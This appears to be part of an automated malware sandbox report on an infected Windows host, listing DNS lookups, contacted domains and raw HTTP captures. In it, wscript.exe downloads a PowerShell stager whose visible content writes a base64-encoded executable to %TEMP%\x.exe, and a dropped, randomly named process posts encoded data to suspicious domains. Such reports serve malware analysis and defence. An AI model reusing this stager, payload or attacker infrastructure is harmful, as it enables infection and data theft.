                                                                        Feb 18, 2025 08:15:36.587939978 CET1.1.1.1192.168.2.40xdc0bNo error (0)www.physicsbrain.xyz13.248.169.48A (IP address)IN (0x0001)false
                                                                        Feb 18, 2025 08:15:36.587939978 CET1.1.1.1192.168.2.40xdc0bNo error (0)www.physicsbrain.xyz76.223.54.146A (IP address)IN (0x0001)false
                                                                        Feb 18, 2025 08:15:49.824531078 CET1.1.1.1192.168.2.40xb2edNo error (0)www.infiniteve.xyz162.0.231.203A (IP address)IN (0x0001)false
                                                                        Feb 18, 2025 08:16:03.191140890 CET1.1.1.1192.168.2.40xc46aNo error (0)www.weilaishijie.xyz13.248.169.48A (IP address)IN (0x0001)false
                                                                        Feb 18, 2025 08:16:03.191140890 CET1.1.1.1192.168.2.40xc46aNo error (0)www.weilaishijie.xyz76.223.54.146A (IP address)IN (0x0001)false
                                                                        Feb 18, 2025 08:16:19.394052029 CET1.1.1.1192.168.2.40xdc90No error (0)www.dqvcbn.info47.83.1.90A (IP address)IN (0x0001)false

                                                                        HTTP Request Dependency Graph

                                                                        • 196.251.92.64
                                                                        • www.lucynoel6465.shop
                                                                        • www.travel-cure.sbs
                                                                        • www.physicsbrain.xyz
                                                                        • www.infiniteve.xyz
                                                                        • www.weilaishijie.xyz
                                                                        • www.dqvcbn.info

                                                                        HTTP Packets

                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        0192.168.2.449731196.251.92.64806892C:\Windows\System32\wscript.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Feb 18, 2025 08:14:23.383867979 CET331OUTGET /crypt/popo.ps1 HTTP/1.1
                                                                        Accept: */*
                                                                        Accept-Language: en-ch
                                                                        UA-CPU: AMD64
                                                                        Accept-Encoding: gzip, deflate
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                        Host: 196.251.92.64
                                                                        Connection: Keep-Alive
                                                                        Feb 18, 2025 08:14:24.092175007 CET1236INHTTP/1.1 200 OK
                                                                        Date: Tue, 18 Feb 2025 07:14:23 GMT
                                                                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                        Last-Modified: Tue, 18 Feb 2025 05:47:14 GMT
                                                                        ETag: "86878-62e642c43d096"
                                                                        Accept-Ranges: bytes
                                                                        Content-Length: 551032
                                                                        Keep-Alive: timeout=5, max=100
                                                                        Connection: Keep-Alive
                                                                        Data Raw: 24 70 3d 5b 49 4f 2e 50 61 74 68 5d 3a 3a 43 6f 6d 62 69 6e 65 28 24 65 6e 76 3a 54 45 4d 50 2c 22 78 2e 65 78 65 22 29 0d 0a 5b 49 4f 2e 46 69 6c 65 5d 3a 3a 57 72 69 74 65 41 6c 6c 42 79 74 65 73 28 24 70 2c 5b 43 6f 6e 76 65 72 74 5d 3a 3a 46 72 6f 6d 42 61 73 65 36 34 53 74 72 69 6e 67 28 22 54 56 71 51 41 41 4d 41 41 41 41 45 41 41 41 41 2f 2f 38 41 41 4c 67 41 41 41 41 41 41 41 41 41 51 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 67 41 41 41 41 41 34 66 75 67 34 41 74 41 6e 4e 49 62 67 42 54 4d 30 68 56 47 68 70 63 79 42 77 63 6d 39 6e 63 6d 46 74 49 47 4e 68 62 6d 35 76 64 43 42 69 5a 53 42 79 64 57 34 67 61 57 34 67 52 45 39 54 49 47 31 76 5a 47 55 75 44 51 30 4b 4a 41 41 41 41 41 41 41 41 41 42 51 52 51 41 41 54 41 45 44 41 4b 30 65 74 47 63 41 41 41 41 41 41 41 41 41 41 4f 41 41 44 67 45 4c 41 54 41 41 41 45 51 47 41 41 42 4b 42 67 41 41 41 41 41 41 79 6d 4d 47 41 41 41 67 41 41 41 41 67 41 59 [TRUNCATED]
                                                                        Data Ascii: $p=[IO.Path]::Combine($env:TEMP,"x.exe")[IO.File]::WriteAllBytes($p,[Convert]::FromBase64String("TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDAK0etGcAAAAAAAAAAOAADgELATAAAEQGAABKBgAAAAAAymMGAAAgAAAAgAYAAABAAAAgAAAAAgAABAAAAAAAAAAEAAAAAAAAAADABgAAAgAAAAAAAAIAYIUAABAAABAAAAAAEAAAEAAAAAAAABAAAAAAAAAAAAAAAHBjBgBXAAAAAKAGAIgFAAAAAAAAAAAAAAAAAAAAAAAAAIAGAAwAAADI+QUAHAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAAAAAAAAAAAAAAACCAAAEgAAAAAAAAAAAAAAC50ZXh0AAAA0EMGAAAgAAAARAYAAAIAAAAAAAAAAAAAAAAAACAAAGAucmVsb2MAAAwAAAAAgAYAAAIAAABGBgAAAAAAAAAAAAAAAABAAABCLnJzcmMAAACIBQAAAKAGAAAGAAAASAYAAAAAAAAAAAAAAAAAQAAAQAAAAAAAAAAAAAAAAAAAAACsYwYAAAAAAEgAAAACAAUAOPoFADhpAAADAAAABAAABqRIAAAksQUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACIAKB0AAAYAKgAAAAMwCQAIAAAAAAAAAAIoEAAABgAqEzAEAE8AAAABAAAR
                                                                        Feb 18, 2025 08:14:24.092207909 CET1236INData Raw: 63 79 55 41 41 41 59 4b 42 69 6a 34 41 41 41 47 4a 53 5a 39 42 67 41 41 42 41 59 43 66 51 63 41 41 41 51 47 41 33 30 49 41 41 41 45 42 67 52 39 43 51 41 41 42 41 59 57 4b 43 6f 41 41 41 5a 39 42 51 41 41 42 41 5a 38 42 67 41 41 42 42 49 41 4b 41
                                                                        Data Ascii: cyUAAAYKBij4AAAGJSZ9BgAABAYCfQcAAAQGA30IAAAEBgR9CQAABAYWKCoAAAZ9BQAABAZ8BgAABBIAKAEAACsGfAYAAAQodQAABiUmKgATMAQARQAAAAIAABEAFygxAAAGJSYoLwEABgofQigxAAAGJSYoLwEABiUmCx9bKDEAAAYlJgwIBgcoAwAABiUmKEoAAAYlJg0SAyjUAAAGACoAAAATMAQAFwAAAAMAABEAAigvAQA
                                                                        Feb 18, 2025 08:14:24.092230082 CET1236INData Raw: 48 31 51 6f 4b 67 41 41 42 67 77 49 4c 42 4d 41 49 4b 54 4c 43 77 41 6f 4d 51 41 41 42 69 6a 6f 41 41 41 47 4a 53 5a 36 41 41 59 4e 4b 77 41 4a 4b 68 4d 77 42 67 41 68 41 41 41 41 43 41 41 41 45 51 41 66 57 43 67 71 41 41 41 47 43 67 49 44 42 42
                                                                        Data Ascii: H1QoKgAABgwILBMAIKTLCwAoMQAABijoAAAGJSZ6AAYNKwAJKhMwBgAhAAAACAAAEQAfWCgqAAAGCgIDBB9cKCoAAAYSACgYAAAGJSYLKwAHKgAAABMwBgBwAAAACQAAEQAEBR9gKCoAAAZYKGQBAAYlJgoCAwYfZCgqAAAGH2goKgAABigWAAAGJSYLBx9sKCoAAAb+AQwILDAYRQEAAAD2////Fy0G0AsAAAYmACDdywsAKDE
                                                                        Feb 18, 2025 08:14:24.092236042 CET1236INData Raw: 42 67 30 41 43 53 44 59 41 41 41 41 4b 43 6f 41 41 41 62 2b 41 52 4d 47 45 51 59 73 48 78 74 46 41 51 41 41 41 50 62 2f 2f 2f 38 41 49 4e 58 4d 43 77 41 6f 4d 51 41 41 42 69 55 6d 4b 4f 67 41 41 41 59 6c 4a 6e 70 2f 42 41 41 41 42 48 73 4e 41 41
                                                                        Data Ascii: Bg0ACSDYAAAAKCoAAAb+ARMGEQYsHxtFAQAAAPb///8AINXMCwAoMQAABiUmKOgAAAYlJnp/BAAABHsNAAAEKBEAAAYlJiDcAAAAKCoAAAb+ARMHEQcsHxdFAQAAAPb///8AIBbNCwAoMQAABiUmKOgAAAYlJnoqAAADMAkABwAAAAAAAAACKGIAAAoqABMwAgAHAAAADAAAEQACCisABioAAzAJAAgAAAAAAAAAAigrAAAKACo
                                                                        Feb 18, 2025 08:14:24.092237949 CET896INData Raw: 41 41 41 47 41 4e 77 47 4c 42 45 63 52 51 45 41 41 41 44 32 2f 2f 2f 2f 42 69 68 59 41 41 41 47 41 4e 77 52 42 43 6f 41 41 41 45 30 41 41 41 43 41 49 38 41 4c 37 34 41 48 67 41 41 41 41 41 43 41 48 73 41 59 64 77 41 43 77 41 41 41 41 41 43 41 48
                                                                        Data Ascii: AAAGANwGLBEcRQEAAAD2////BihYAAAGANwRBCoAAAE0AAACAI8AL74AHgAAAAACAHsAYdwACwAAAAACAHUAcucACwAAAAACAAkA6fIAFQAAAAADMAkACAAAAAAAAAACKCsAAAoAKhswBQDKAAAAEgAAEQJ7BQAABAoAAgJ7BwAABAJ7CAAABAJ7CQAABCgFAAAGJSZ9CgAABAJ7CgAABH6cAAAE/gMLByw9AAIoNwEABiUmIGr
                                                                        Feb 18, 2025 08:14:24.218756914 CET1236INData Raw: 41 35 45 67 66 2f 2f 2f 2f 31 38 65 59 67 6f 47 66 68 6b 41 41 41 51 44 46 31 69 52 59 41 6f 44 47 46 6a 2b 43 77 45 41 4b 30 46 2b 47 51 41 41 42 41 4f 52 49 44 2f 2f 2f 2f 39 66 48 78 68 69 43 67 5a 2b 47 51 41 41 42 41 4d 58 57 4a 45 66 45 47
                                                                        Data Ascii: A5Egf////18eYgoGfhkAAAQDF1iRYAoDGFj+CwEAK0F+GQAABAORID////9fHxhiCgZ+GQAABAMXWJEfEGJgCgZ+GQAABAMYWJEeYmAKBn4ZAAAEAxlYkWAKAxpY/gsBAAYXLwEqfhkAAAQDAhYGKBwAAAoqAAATMAUARQAAABMAABF+HAAABC09cm0AAHAKBig/AAAKJSYLKGQAAAolJgcWB45pb2UAAAoKKBEAAAolJgZvFwA
                                                                        Feb 18, 2025 08:14:24.218781948 CET224INData Raw: 41 41 59 4b 33 67 30 6d 48 32 46 71 41 79 67 34 41 41 41 47 43 74 34 41 42 69 6f 42 45 41 41 41 41 41 41 41 41 41 6b 4a 41 41 30 68 41 41 41 42 45 7a 41 48 41 44 4d 44 41 41 41 5a 41 41 41 52 41 79 69 53 41 41 41 47 4a 53 59 4b 42 67 74 2b 62 67
                                                                        Data Ascii: AAYK3g0mH2FqAyg4AAAGCt4ABioBEAAAAAAAAAkJAA0hAAABEzAHADMDAAAZAAARAyiSAAAGJSYKBgt+bgAABAwXDSsNBiiaAAAGJSYmCRdYDQkaMu8GKJoAAAYlJtETBBEEZtETBBEEGF85/AEAACjQAAAGJSYTBR4oVwEABiUmEwYGEQYWHiijAAAGJSYmEQURBihJAQAGHihXAQAGEwcGEQcWHiij
                                                                        Feb 18, 2025 08:14:24.218811989 CET1236INData Raw: 41 41 41 47 4a 53 59 6d 46 78 4d 49 45 51 63 54 46 68 59 54 46 79 73 70 45 52 59 52 46 35 45 54 43 52 45 4a 4c 42 67 58 52 51 45 41 41 41 44 32 2f 2f 2f 2f 46 79 30 47 30 44 67 41 41 41 59 6d 46 68 4d 49 4b 78 34 52 46 78 64 59 45 78 63 52 46 78
                                                                        Data Ascii: AAAGJSYmFxMIEQcTFhYTFyspERYRF5ETCREJLBgXRQEAAAD2////Fy0G0DgAAAYmFhMIKx4RFxdYExcRFxEWKFwBAAYlJmkyyRpFAQAAAPb///8RCCwYF0UBAAAA9v///yhxAAAGKDUAAAYlJhMHEQURByjsAAAGfiEAAAQtRBpFAQAAAPb///9+HwAABCD///9/Mx8dRQEAAAD2////fiEAAAQGKEUBAAYlJmkoVgEABisPfiE
                                                                        Feb 18, 2025 08:14:24.218830109 CET1236INData Raw: 62 51 41 41 43 69 68 77 41 41 41 4b 4a 53 59 4d 43 43 67 34 41 51 41 47 4a 53 59 4c 33 67 4d 6d 2f 68 6f 47 49 43 67 45 41 41 42 76 63 51 41 41 43 68 4d 51 46 68 4d 52 4f 4b 51 42 41 41 41 52 45 42 45 52 6d 67 30 48 62 33 49 41 41 41 6f 73 48 78
                                                                        Data Ascii: bQAACihwAAAKJSYMCCg4AQAGJSYL3gMm/hoGICgEAABvcQAAChMQFhMROKQBAAAREBERmg0Hb3IAAAosHxdFAQAAAPb///8Jb3MAAAoHKHQAAAolJhMEOGMBAAAHb3UAAAoTBREFKFQAAAYlJmkXWBMGEQYoSwAABiUmEwcHb3YAAApvdwAACiUmLB0aRQEAAAD2////EQcWB292AAAKb3gAAAolJqIrEhEHFig9AQAGJSYoEAA
                                                                        Feb 18, 2025 08:14:24.218847990 CET1236INData Raw: 43 68 45 47 46 7a 45 57 47 6b 55 42 41 41 41 41 39 76 2f 2f 2f 78 45 4b 66 6e 38 41 41 41 70 76 66 67 41 41 43 68 45 47 47 44 45 57 46 30 55 42 41 41 41 41 39 76 2f 2f 2f 78 45 4b 66 6f 41 41 41 41 70 76 66 67 41 41 43 68 45 47 47 54 45 57 47 6b
                                                                        Data Ascii: ChEGFzEWGkUBAAAA9v///xEKfn8AAApvfgAAChEGGDEWF0UBAAAA9v///xEKfoAAAApvfgAAChEGGTEWGkUBAAAA9v///xEKfoEAAApvfgAAChEGGjEzF0UBAAAA9v///xoTCysUEQp+ggAAChELb4MAAAoRCxdYEwsRCxEGMuYZRQEAAAD2////EQp+iwAACgdvjAAAChEKfogAAApvfgAAChEJBm+JAAAKJSYTBAkUEQRvigA
                                                                        Feb 18, 2025 08:14:24.218868017 CET672INData Raw: 52 51 41 41 42 69 6f 41 41 46 59 67 45 77 41 41 41 69 41 49 41 41 41 4b 49 50 2f 2f 2f 77 41 6f 50 41 41 41 42 69 6f 41 41 44 4a 2b 61 67 41 41 42 41 49 6f 53 51 41 41 42 69 6f 41 41 41 41 65 41 6f 31 56 41 41 41 42 4b 6c 59 67 46 51 41 41 41 69
                                                                        Data Ascii: RQAABioAAFYgEwAAAiAIAAAKIP///wAoPAAABioAADJ+agAABAIoSQAABioAAAAeAo1VAAABKlYgFQAAAiAJAAAKIP///wAoPAAABioAADZ+awAABAIDKE4AAAYqAABWIBYAAAIgCgAACiD///8AKDwAAAYqAAA6fmwAAAQCAwQoUgAABioADgKOKlYgGAAAAiALAAAKIP///wAoPAAABioAADJ+bQAABAIoVwAABioAAAAKACo


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        1192.168.2.452381104.21.16.1802924C:\Program Files (x86)\OVrzdtpAJkUFNFxlpUNgueJzbCMfzzemcypfNUNWleVznMyEoygbG\sxkv2RIDKUVCF4X010eCnC.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Feb 18, 2025 08:15:07.511040926 CET572OUTGET /9gtw/?JZfd=bFQVCxzo4meVUPRnP0n3FR5ZzBASsiXRVHB0uPlWJiDXwsbOt8zcfdxm4ktJdQTn5zPq+Y8ykDyEtSWLtIWRcrie4i7GHURObbczaEgRbEWCMNyWzbPKN50=&28t=_DlH9FNpJbu HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Language: en-us
                                                                        Host: www.lucynoel6465.shop
                                                                        Connection: close
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB7.5; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; .NET4.0C; BRI/1)
                                                                        Feb 18, 2025 08:15:08.250482082 CET776INHTTP/1.1 404 Not Found
                                                                        Date: Tue, 18 Feb 2025 07:15:08 GMT
                                                                        Content-Type: text/html
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Avh9oG%2FGUuJNIk6FyMX5v4igg5uPyGtSmqokcByDkVEsaFhOp2B4HitzxqRiwXYsWV9akBw4X0sO0%2FoVGAi1O1OClzVow30sBGvHn%2F8NKtnvFqPqgGsAgnCSR5VRlCuTowlApyoWQ8E%3D"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 913c39665fed72a1-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1902&min_rtt=1902&rtt_var=951&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=572&delivery_rate=0&cwnd=197&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Feb 18, 2025 08:15:08.250940084 CET567INData Raw: 32 32 62 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f
                                                                        Data Ascii: 22b<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        2192.168.2.452479199.59.243.160802924C:\Program Files (x86)\OVrzdtpAJkUFNFxlpUNgueJzbCMfzzemcypfNUNWleVznMyEoygbG\sxkv2RIDKUVCF4X010eCnC.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Feb 18, 2025 08:15:23.448081017 CET837OUTPOST /0c5p/ HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Encoding: gzip, deflate
                                                                        Accept-Language: en-us
                                                                        Host: www.travel-cure.sbs
                                                                        Origin: http://www.travel-cure.sbs
                                                                        Referer: http://www.travel-cure.sbs/0c5p/
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Content-Length: 201
                                                                        Connection: close
                                                                        Cache-Control: max-age=0
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB7.5; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; .NET4.0C; BRI/1)
                                                                        Data Raw: 4a 5a 66 64 3d 55 6d 38 7a 57 4d 39 35 69 53 30 62 71 49 62 71 47 43 57 42 45 36 58 47 70 77 57 55 78 59 33 35 52 47 59 79 59 6a 74 72 66 31 4f 7a 6e 49 49 6c 49 30 4e 66 61 76 41 53 51 48 4c 76 30 70 49 4c 53 32 72 73 70 36 39 63 37 62 45 4e 6f 51 69 43 64 54 6b 30 61 2b 55 4b 67 52 73 50 57 42 4d 46 4b 48 6f 50 37 2f 5a 43 74 48 76 64 2b 39 43 6e 68 51 6c 63 44 2f 72 45 67 77 67 39 62 50 73 31 52 62 56 6b 50 75 68 62 53 45 4e 47 37 35 38 57 5a 39 75 37 4c 6a 42 43 47 36 75 63 42 34 4f 55 66 39 7a 53 48 44 38 79 6a 79 6c 4b 62 62 67 31 5a 4e 35 5a 39 33 64 73 74 71 45 71 6f 66 43 6a 46 51 3d 3d
                                                                        Data Ascii: JZfd=Um8zWM95iS0bqIbqGCWBE6XGpwWUxY35RGYyYjtrf1OznIIlI0NfavASQHLv0pILS2rsp69c7bENoQiCdTk0a+UKgRsPWBMFKHoP7/ZCtHvd+9CnhQlcD/rEgwg9bPs1RbVkPuhbSENG758WZ9u7LjBCG6ucB4OUf9zSHD8yjylKbbg1ZN5Z93dstqEqofCjFQ==
                                                                        Feb 18, 2025 08:15:23.924133062 CET1236INHTTP/1.1 200 OK
                                                                        Date: Tue, 18 Feb 2025 07:15:23 GMT
                                                                        Content-Type: text/html; charset=utf-8
                                                                        Content-Length: 1126
                                                                        X-Request-Id: f809613a-3212-44e0-a399-20520b573667
                                                                        Cache-Control: no-store, max-age=0
                                                                        Accept-Ch: sec-ch-prefers-color-scheme
                                                                        Critical-Ch: sec-ch-prefers-color-scheme
                                                                        Vary: sec-ch-prefers-color-scheme
                                                                        X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_e4LRkG2QSEWcowdhadwDkA8W0GljayBrE04mOmc4IHhxHJACsyzw3zLKOJGAlb6QwDIaPOFVnyDGa0kNE8Ip+w==
                                                                        Set-Cookie: parking_session=f809613a-3212-44e0-a399-20520b573667; expires=Tue, 18 Feb 2025 07:30:23 GMT; path=/
                                                                        Connection: close
                                                                        Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 65 34 4c 52 6b 47 32 51 53 45 57 63 6f 77 64 68 61 64 77 44 6b 41 38 57 30 47 6c 6a 61 79 42 72 45 30 34 6d 4f 6d 63 34 49 48 68 78 48 4a 41 43 73 79 7a 77 33 7a 4c 4b 4f 4a 47 41 6c 62 36 51 77 44 49 61 50 4f 46 56 6e 79 44 47 61 30 6b 4e 45 38 49 70 2b 77 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                        Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_e4LRkG2QSEWcowdhadwDkA8W0GljayBrE04mOmc4IHhxHJACsyzw3zLKOJGAlb6QwDIaPOFVnyDGa0kNE8Ip+w==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                        Feb 18, 2025 08:15:23.924149036 CET579INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                                        Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiZjgwOTYxM2EtMzIxMi00NGUwLWEzOTktMjA1MjBiNTczNjY3IiwicGFnZV90aW1lIjoxNzM5ODYyOT


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        3192.168.2.452495199.59.243.160802924C:\Program Files (x86)\OVrzdtpAJkUFNFxlpUNgueJzbCMfzzemcypfNUNWleVznMyEoygbG\sxkv2RIDKUVCF4X010eCnC.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Feb 18, 2025 08:15:26.004981041 CET857OUTPOST /0c5p/ HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Encoding: gzip, deflate
                                                                        Accept-Language: en-us
                                                                        Host: www.travel-cure.sbs
                                                                        Origin: http://www.travel-cure.sbs
                                                                        Referer: http://www.travel-cure.sbs/0c5p/
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Content-Length: 221
                                                                        Connection: close
                                                                        Cache-Control: max-age=0
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB7.5; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; .NET4.0C; BRI/1)
                                                                        Data Raw: 4a 5a 66 64 3d 55 6d 38 7a 57 4d 39 35 69 53 30 62 71 6f 72 71 64 6c 43 42 47 61 58 48 6d 51 57 55 37 34 33 39 52 47 55 79 59 6d 64 37 66 48 61 7a 6e 70 34 6c 4a 31 4e 66 54 2f 41 53 61 6e 4c 51 37 4a 4a 48 53 32 32 54 70 34 70 63 37 66 73 4e 6f 51 53 43 64 67 63 33 41 4f 55 49 31 42 73 42 59 68 4d 46 4b 48 6f 50 37 37 34 5a 74 48 6e 64 39 4f 71 6e 67 31 52 66 4f 66 72 48 6e 77 67 39 66 50 73 78 52 62 55 44 50 73 56 78 53 47 6c 47 37 38 41 57 5a 73 75 34 42 6a 42 45 59 4b 76 50 4a 62 75 66 64 59 36 43 47 56 77 68 39 77 78 55 58 39 74 76 49 38 59 4f 76 33 35 66 77 74 4e 65 6c 63 2f 71 65 58 47 64 61 74 68 72 38 2f 4c 77 31 42 70 78 55 6e 38 53 36 31 41 3d
                                                                        Data Ascii: JZfd=Um8zWM95iS0bqorqdlCBGaXHmQWU7439RGUyYmd7fHaznp4lJ1NfT/ASanLQ7JJHS22Tp4pc7fsNoQSCdgc3AOUI1BsBYhMFKHoP774ZtHnd9Oqng1RfOfrHnwg9fPsxRbUDPsVxSGlG78AWZsu4BjBEYKvPJbufdY6CGVwh9wxUX9tvI8YOv35fwtNelc/qeXGdathr8/Lw1BpxUn8S61A=
                                                                        Feb 18, 2025 08:15:26.471092939 CET1236INHTTP/1.1 200 OK
                                                                        Date: Tue, 18 Feb 2025 07:15:26 GMT
                                                                        Content-Type: text/html; charset=utf-8
                                                                        Content-Length: 1126
                                                                        X-Request-Id: 0bb2488f-7b04-4dc7-9894-481b87228d4c
                                                                        Cache-Control: no-store, max-age=0
                                                                        Accept-Ch: sec-ch-prefers-color-scheme
                                                                        Critical-Ch: sec-ch-prefers-color-scheme
                                                                        Vary: sec-ch-prefers-color-scheme
                                                                        X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_e4LRkG2QSEWcowdhadwDkA8W0GljayBrE04mOmc4IHhxHJACsyzw3zLKOJGAlb6QwDIaPOFVnyDGa0kNE8Ip+w==
                                                                        Set-Cookie: parking_session=0bb2488f-7b04-4dc7-9894-481b87228d4c; expires=Tue, 18 Feb 2025 07:30:26 GMT; path=/
                                                                        Connection: close
                                                                        Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 65 34 4c 52 6b 47 32 51 53 45 57 63 6f 77 64 68 61 64 77 44 6b 41 38 57 30 47 6c 6a 61 79 42 72 45 30 34 6d 4f 6d 63 34 49 48 68 78 48 4a 41 43 73 79 7a 77 33 7a 4c 4b 4f 4a 47 41 6c 62 36 51 77 44 49 61 50 4f 46 56 6e 79 44 47 61 30 6b 4e 45 38 49 70 2b 77 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 